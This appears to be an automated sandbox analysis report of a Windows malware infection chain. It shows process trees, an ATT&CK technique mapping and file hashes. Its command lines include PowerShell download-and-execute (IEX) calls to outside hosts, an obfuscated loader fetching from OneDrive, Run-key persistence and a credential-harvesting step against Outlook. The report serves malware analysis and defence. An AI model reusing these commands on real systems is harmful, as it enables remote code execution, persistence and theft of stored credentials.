PID 2196 wrote to memory of 2292	2196	powershell.exe	aspnet_compiler.exe
PID 2196 wrote to memory of 2292	2196	powershell.exe	aspnet_compiler.exe
PID 2196 wrote to memory of 2292	2196	powershell.exe	aspnet_compiler.exe
PID 2196 wrote to memory of 2292	2196	powershell.exe	aspnet_compiler.exe
PID 3336 wrote to memory of 2496	3336	WScript.exe	cmd.exe
PID 3336 wrote to memory of 2496	3336	WScript.exe	cmd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Required-document.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:312
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C POWERSHELL.EXE -exec Bypass -C [System.Net.WebClient]$webClient = N`e`w-Object System.Net.WebClient;[System.IO.Stream]$23830 = $webClient.OpenRead('http://ec2-3-235-29-66.compute-1.amazonaws.com/wrold/LM.txt');[System.IO.StreamReader]$17112 = N`e`w-Object System.IO.StreamReader -argumentList $23830;[System.Threading.Thread]::Sleep(1000);[string]$68248 = $17112.ReadToEnd();IEX $68248;
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2120
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    POWERSHELL.EXE -exec Bypass -C [System.Net.WebClient]$webClient = N`e`w-Object System.Net.WebClient;[System.IO.Stream]$23830 = $webClient.OpenRead('http://ec2-3-235-29-66.compute-1.amazonaws.com/wrold/LM.txt');[System.IO.StreamReader]$17112 = N`e`w-Object System.IO.StreamReader -argumentList $23830;[System.Threading.Thread]::Sleep(1000);[string]$68248 = $17112.ReadToEnd();IEX $68248;
    3⤵
    - Blocklisted process makes network request
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1612
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\23.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:3916
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\23.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2424
      - C:\Windows\system32\reg.exe
        
        REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 1 /d "C:\ProgramData\Twitter\log\Untitled.exe"
        6⤵
        Adds Run key to start application
        
        PID:1208
      - C:\Windows\system32\reg.exe
        
        REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 2 /d "C:\Windows\System32\cmd.exe '/c powershell -windo 1 -noexit -exec bypass -file C:\ProgramData\Twitter\log\look.ps1"
        6⤵
        Adds Run key to start application
        
        PID:1036
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted C:\ProgramData\Twitter\log\look.ps1
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:3260
    - - C:\ProgramData\Twitter\log\Untitled.exe
        
        "C:\ProgramData\Twitter\log\Untitled.exe"
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        
        PID:3456
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C POWERSHELL.EXE -exec Bypass -C [System.Net.WebClient]$webClient = N`e`w-Object System.Net.WebClient;[System.IO.Stream]$23830 = $webClient.OpenRead('http://ec2-3-235-29-66.compute-1.amazonaws.com/windows/Filnal.txt');[System.IO.StreamReader]$17112 = N`e`w-Object System.IO.StreamReader -argumentList $23830;[System.Threading.Thread]::Sleep(1000);[string]$68248 = $17112.ReadToEnd();IEX $68248;
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3448
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    POWERSHELL.EXE -exec Bypass -C [System.Net.WebClient]$webClient = N`e`w-Object System.Net.WebClient;[System.IO.Stream]$23830 = $webClient.OpenRead('http://ec2-3-235-29-66.compute-1.amazonaws.com/windows/Filnal.txt');[System.IO.StreamReader]$17112 = N`e`w-Object System.IO.StreamReader -argumentList $23830;[System.Threading.Thread]::Sleep(1000);[string]$68248 = $17112.ReadToEnd();IEX $68248;
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3800
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted C:\Users\Public\Untitled.ps1
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3168

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3640
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.ps1
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1140
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      PID:3316
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2984
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\idgrik.vbs"' & exit
        5⤵
        
        PID:3964
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\idgrik.vbs"'
        6⤵
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:2080
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\idgrik.vbs"
        7⤵
        Checks computer location settings
        
        PID:1188
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [System.Threading.Thread]::Sleep(5000); $373='(New-';$cxZ = '991 '.Replace('991','Object');$337 = '894'.Replace('894','Net');$389 = 'zfN'.Replace('zfN','.We');$Uxl='999 '.Replace('999 ','.Downlo');$121 = '663'.Replace('663','bClient)');$175='490(''https://onedrive.live.com/Download?cid=358166AEFCA69E90&resid=358166AEFCA69E90%21117&authkey=AEDLEj6cLtUA2Vo'')'.Replace('490','adString');$195 = $373,$cxZ,$337,$389,$121,$Uxl,$175;$242 = '341 '.Replace('341 ','I`E`X');$023 = $242+($195 -Join '')|I`E`X;
        8⤵
        Blocklisted process makes network request
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:3188
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\0011aa\aaa.vbs"
        9⤵
        Checks computer location settings
        
        PID:3480
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\0011aa\aaa.bat" "
        10⤵
        
        PID:3652
        
        C:\0011aa\7z.exe
        
        7z x 0011aa.zip
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3904
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\0011aa\11.vbs"
        9⤵
        Checks computer location settings
        
        PID:2568
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c set __COMPAT_LAYER=RunAsInvoker && AllInOnePasswordRecoveryPro.exe 11pass.csv
        10⤵
        
        PID:448
        
        C:\0011aa\AllInOnePasswordRecoveryPro.exe
        
        AllInOnePasswordRecoveryPro.exe 11pass.csv
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        Accesses Microsoft Outlook accounts
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:3300

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:820
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.ps1
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:3352
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      PID:1276

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:940
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.ps1
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2196
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      PID:2292

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.bat" "
  2⤵
  PID:2496
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.ps1
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    PID:2080
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      PID:3340
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      PID:1568

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.vbs"
1⤵
- Checks computer location settings
PID:776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.bat" "
  2⤵
  PID:868
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.ps1
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    PID:1256
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      PID:1748

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.vbs"
1⤵
- Checks computer location settings
PID:3980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.bat" "
  2⤵
  PID:368
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.ps1
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    PID:1708
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      PID:3920

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.vbs"
1⤵
- Checks computer location settings
PID:3472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.bat" "
  2⤵
  PID:3804
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.ps1
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    PID:976
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      PID:2496

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.vbs"
1⤵
- Checks computer location settings
PID:3644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.bat" "
  2⤵
  PID:3016
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.ps1
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    PID:556
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      PID:492

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.vbs"
1⤵
- Checks computer location settings
PID:3052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.bat" "
  2⤵
  PID:2760
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.ps1
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    PID:2616
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      PID:2208

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\0011aa\0011aa.zip

MD5
375b5d9f99b0b41015fa8a54ba90fc23

SHA1
4911b2cf2098f2142a180188a920c456123c7c98

SHA256
5ed946b8d19c22644e6a580a157835da9476b18f633b37ede48b31b862972362

SHA512
d738ef565f72f8eb41ca1f7ad80cbce16891ab832fd8e2303c35289c3e52e62a9add516c01e4255d798d61d1db6e5b76928fa65f96ecc1cf65f5ac1a42d24008

Download Submit
C:\0011aa\7z.dll

MD5
26dc695a8d549d1c9137c14e6d3b8b4d

SHA1
0b7956d7343877c41f75b2c593258cf6e0e78863

SHA256
9ed007aa82e440ceb39a6e105bb1d602a9bc59a4946267ba8de2f220aa15bc06

SHA512
ff3eb73a0e09593503f7463a1d293652c889e84f15bd70542e82029612544390d516b54ed748e242e74c394fcc9602bf823d174bdcead8ae07df0e7a086af8c7

Download Submit
C:\0011aa\7z.dll

MD5
26dc695a8d549d1c9137c14e6d3b8b4d

SHA1
0b7956d7343877c41f75b2c593258cf6e0e78863

SHA256
9ed007aa82e440ceb39a6e105bb1d602a9bc59a4946267ba8de2f220aa15bc06

SHA512
ff3eb73a0e09593503f7463a1d293652c889e84f15bd70542e82029612544390d516b54ed748e242e74c394fcc9602bf823d174bdcead8ae07df0e7a086af8c7

Download Submit
C:\0011aa\7z.exe

MD5
3e797119e0fd64297cb82794b8d68edd

SHA1
a67d3b35743f6ca383673a3848b8c97ec164cc0d

SHA256
c7245e21a7553d9e52d434002a401c77a7ca7d0f245f2311b0ddf16f8f946c6f

SHA512
1378c54a3a1c5bd73c04e787d218f245024625003d689379013f1343c7f9e6282d670c3d68edce6006629ca90cddd27ac3f53f640f96c4936bbff319658caef8

Download Submit
C:\0011aa\7z.exe

MD5
3e797119e0fd64297cb82794b8d68edd

SHA1
a67d3b35743f6ca383673a3848b8c97ec164cc0d

SHA256
c7245e21a7553d9e52d434002a401c77a7ca7d0f245f2311b0ddf16f8f946c6f

SHA512
1378c54a3a1c5bd73c04e787d218f245024625003d689379013f1343c7f9e6282d670c3d68edce6006629ca90cddd27ac3f53f640f96c4936bbff319658caef8

Download Submit
C:\0011aa\AllInOnePasswordRecoveryPro.exe

MD5
a48e3197ab0f64c4684f0828f742165c

SHA1
f935c3d6f9601c795f2211e34b3778fad14442b4

SHA256
baecc747370a4c396ef5403a3a2b286465d8fe4677bf1bfd23b8164ef5c22bbb

SHA512
e0b0b73c39850a30aac89f84f721c79f863612f596d6ff3df0860a9faf743a81364656773c99708e9c0656c74b6a278b6bf7e648f7ff1b9080f9a21e10515a59

Download Submit
C:\0011aa\XenManager.dll

MD5
7a5c53a889c4bf3f773f90b85af5449e

SHA1
25b2928c310b3068b629e9dca38c7f10f6adc5b6

SHA256
baa9c3a0d0524263c4f848056b3f1da3b4bb913162362cbcabe77ce76a39870c

SHA512
f5943687d7e098790581bf56ac6fec3b7e9b83d0e29301077a8bc48768c5a0e9f54f53d926f9847885f6035a2b31e456e4e45ccf1c70be27229c46e79876e2ed

Download Submit
C:\0011aa\aaa.bat

MD5
c05713f7eddc51461df03b2255c8c89b

SHA1
af3870fb87cd8c10b08d1c906636923edf35a904

SHA256
f5f7e1f901cf78ffe658ad7839106d4a1c003b4b8ce6f23422a94ba23b92c65d

SHA512
2edede06e30ea21ce4797db0d2e856d86c80464b116253ffb2c26d9389a725f3d5ed9d8beadebecd6da40f6e883c3ea54bd7d1aee7f3723ef495a960ac1337fb

Download Submit
C:\0011aa\aaa.vbs

MD5
74a18626dac256067d67dbe5454bdc41

SHA1
d2001b3a67903dcf6c321b6aa4cf82a245ed779a

SHA256
89b1559449bc7c06c66baf1fae511c5ea39613d6a891c6313e9ecf5351cd2310

SHA512
758e82ea96c4ca4f502e40706cb5f0929057801fbd651490e73c37d9667f707fc7840de192767b8a47401acb0d63b4e7508a0d40d6bc9534139e2d755e68af90

Download Submit
C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.bat

MD5
45ac89f25abeb483070054615e261e21

SHA1
dd384c5c2f5952c24f5c9afbe558b76283d5721e

SHA256
0abe864608ede0c523020a40de8b2f4d6bf3822748e83404b84711029b1f9f3d

SHA512
21583faf702a6ee71a263b6ab680cbb9ba717a19c4cfcbcb87f773319b104b9eb4b45e34a81d9a8d2f9090d63317c68d8feb74bc2a7b6bd4a84d3d3502e14ab1

Download Submit
C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.ps1

MD5
152c02c37fe720995b6f3cc7dd0a91d5

SHA1
ee7ea5e01f2e4f9b4c005d36cd830ab3e3fda940

SHA256
4c8e18c47bf2a1d435d6ad4069e2e919dfa27210bb192046930854fd9d3a6364

SHA512
b52f1614705db5918af160680c9894a1a8a0a4f66b9f84ccfb0f5d9c6691591758b38187b155f75fa806596d84727d6e771ca206ea0e00ecb64cd36130a3ecce

Download Submit
C:\ProgramData\Plugs\System32\Microsoft\SystemData\OFF.vbs

MD5
3615e47d5885079ec4b4606203c49aa4

SHA1
562e249803b64dab367077eb1ab06a6ade794f62

SHA256
6645acb893de5acc86585dd59a1a0e086354cc1aa7a4620fe7e073c3c747f00a

SHA512
1c9a4689dbf80cbade78356bd78d71e743368c889fe3855454d0a65828137738602e995482bf3455f4c46bbe5c21139219ee56c60f8e1536b67e94fcef73ca45

Download Submit
C:\ProgramData\Twitter\log\Untitled.exe

MD5
c71711d472a03ef3de8bd0c685394ef5

SHA1
178724041e00a3e607bae8dda8cec86761dd7250

SHA256
fc64e7337e23dc861c4b4a4bbe26189cb388add1ed27198779c701e6ab1cc2b6

SHA512
f50a3752702266d6f7635c86de9aee0bc53cb6ab64b5f29903da964c50afd5a5d19d043ae886ff1865d1790cc5ac7f9cffd5d67735c2138613d1b9e3dbc3b299

Download Submit
C:\ProgramData\Twitter\log\Untitled.exe

MD5
c71711d472a03ef3de8bd0c685394ef5

SHA1
178724041e00a3e607bae8dda8cec86761dd7250

SHA256
fc64e7337e23dc861c4b4a4bbe26189cb388add1ed27198779c701e6ab1cc2b6

SHA512
f50a3752702266d6f7635c86de9aee0bc53cb6ab64b5f29903da964c50afd5a5d19d043ae886ff1865d1790cc5ac7f9cffd5d67735c2138613d1b9e3dbc3b299

Download Submit
C:\ProgramData\Twitter\log\Untitled.exe.manifest

MD5
24f26c688abc0b914c8a030d15d24383

SHA1
84a2de81580d9eed74cd8bab29f9da8ac35ef01a

SHA256
4e52f56369c1236be30e8a38014eef0340fee807a2829d47304265788d81ea88

SHA512
50d2c9da22f0962c39283e4f5e2b239fb1464c3ae77db1db776f51b3e36162be510c96164ed22e0b6e66f017fdb33aafc9f1279f4ce6b864af99341c55d5e73f

Download Submit
C:\ProgramData\Twitter\log\look.ps1

MD5
227e61b8819336b4b01e6f30a3329217

SHA1
c17c543e9edfd01a6e82bdba1bb819e467063f30

SHA256
2704b0a8a0518e0b4f17283b6c30082cfce0dfb5d05e689dea99b98c97643f42

SHA512
b02fc60caf4966e793a3931348ec925fbb56ced59eee0164b2b8adf8aac774aa53a6c5e7649735138a13791bf44f923c4b3ed0f80c3877afb6f491bc13e51bb1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aspnet_compiler.exe.log

MD5
4eaca4566b22b01cd3bc115b9b0b2196

SHA1
e743e0792c19f71740416e7b3c061d9f1336bf94

SHA256
34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

SHA512
bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5
def65711d78669d7f8e69313be4acf2e

SHA1
6522ebf1de09eeb981e270bd95114bc69a49cda6

SHA256
aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

SHA512
05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5
99709fd2a1ac3bbfe59ec6e73f07f726

SHA1
f88f8fa9d813597a48ad55640596edf4eda6d50b

SHA256
cab3d80d6944534caf8d9e886e3377616ce16a53a99d54bd1d5d9f28a4d20ea5

SHA512
44f3e8bcf0d71c840002d9c4c793d143afda8699889b7a728d96840ca0dad04992f8c9220601894c66ab2650fd255e0eb23f1157b6eb19539af8344007d5bc47

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
d0f3eff52698c0eab8a2c8bd1d9f7c18

SHA1
4292ae775443749c6c2281dac800d86b4bdde07e

SHA256
b16c74cbb71b5ba7bbf32696feb6869d9a0fa3bac42042a3fe8f3d48e2d5dbf6

SHA512
642b5d51a4cec6094e6789f29eb68885068583a08e102606b7ed2ace036cacd8b3bc428cef6f8cbfaadf5644fe52149211f7fc6774fc4ff458bd76cfae703cfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
3fec295448f33fc791f27798e231cfa1

SHA1
40ba5b9773c7ff23002e2bbab326641ffd2da9ce

SHA256
fd436b2a1294081023a388f41db9c5bd0489c5ffe5e5f76ee386e6783f8dbef6

SHA512
f9d6229318da887e1af67f8d3ea1e953eb016126c08adca91d6d2e4852bec7361388939ddce294754668630dfa5176eeca89c8eacb07722a00f3560a7da0bc08

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
32bc1a04aeb037c48e2cfe155187c7c7

SHA1
0e6eb24a028b5bbdbf16e1921ddbcf0047839458

SHA256
05b694068860092a73d6da347dae9817f40ec516f1a0efa1430164f83daa9b9f

SHA512
f72390e2ac0380370765163a49af4ce823ee2a5bd107f2b235ad22ee0ca560425c81973d359da8518c3a71a3b8159c57f819dbbb08520065594be0a6c8debab0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
4d444e4cd8a1f7d9c922d8f581fec35a

SHA1
5b260b1fc3c0d08ba8d7165a9e801ee2e0c1f50c

SHA256
0bcbe921e49d7e8ede4198c0f9e5577c3ee9e6514389b19de22bc5296935de52

SHA512
cdb484b89c2340955f35ea1d16ef5f5b96f1afb53143f413b714b512249e716fed0f9211c2638cd44862ac4b0e7c2f9d80e8868f2347023c3e65bb5a0a13825e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
277f8a28e52e5d152911ca396aafc201

SHA1
e1c9a16e02d7f441b7ef8b158bedb1d073b027bc

SHA256
db34d44a764abe98ab93c23cd7ef48ca8170e362b1123498d672b015946011d0

SHA512
03febe29689333eeed9af284ba785bdacaed2945ed6e47911129e555d2b3a83b087081fd1f2e30cfa9b4ca751261af3b2e3a3e3cd4c37c0a5d67e648d0f49f57

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
4d444e4cd8a1f7d9c922d8f581fec35a

SHA1
5b260b1fc3c0d08ba8d7165a9e801ee2e0c1f50c

SHA256
0bcbe921e49d7e8ede4198c0f9e5577c3ee9e6514389b19de22bc5296935de52

SHA512
cdb484b89c2340955f35ea1d16ef5f5b96f1afb53143f413b714b512249e716fed0f9211c2638cd44862ac4b0e7c2f9d80e8868f2347023c3e65bb5a0a13825e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
277f8a28e52e5d152911ca396aafc201

SHA1
e1c9a16e02d7f441b7ef8b158bedb1d073b027bc

SHA256
db34d44a764abe98ab93c23cd7ef48ca8170e362b1123498d672b015946011d0

SHA512
03febe29689333eeed9af284ba785bdacaed2945ed6e47911129e555d2b3a83b087081fd1f2e30cfa9b4ca751261af3b2e3a3e3cd4c37c0a5d67e648d0f49f57

Download Submit
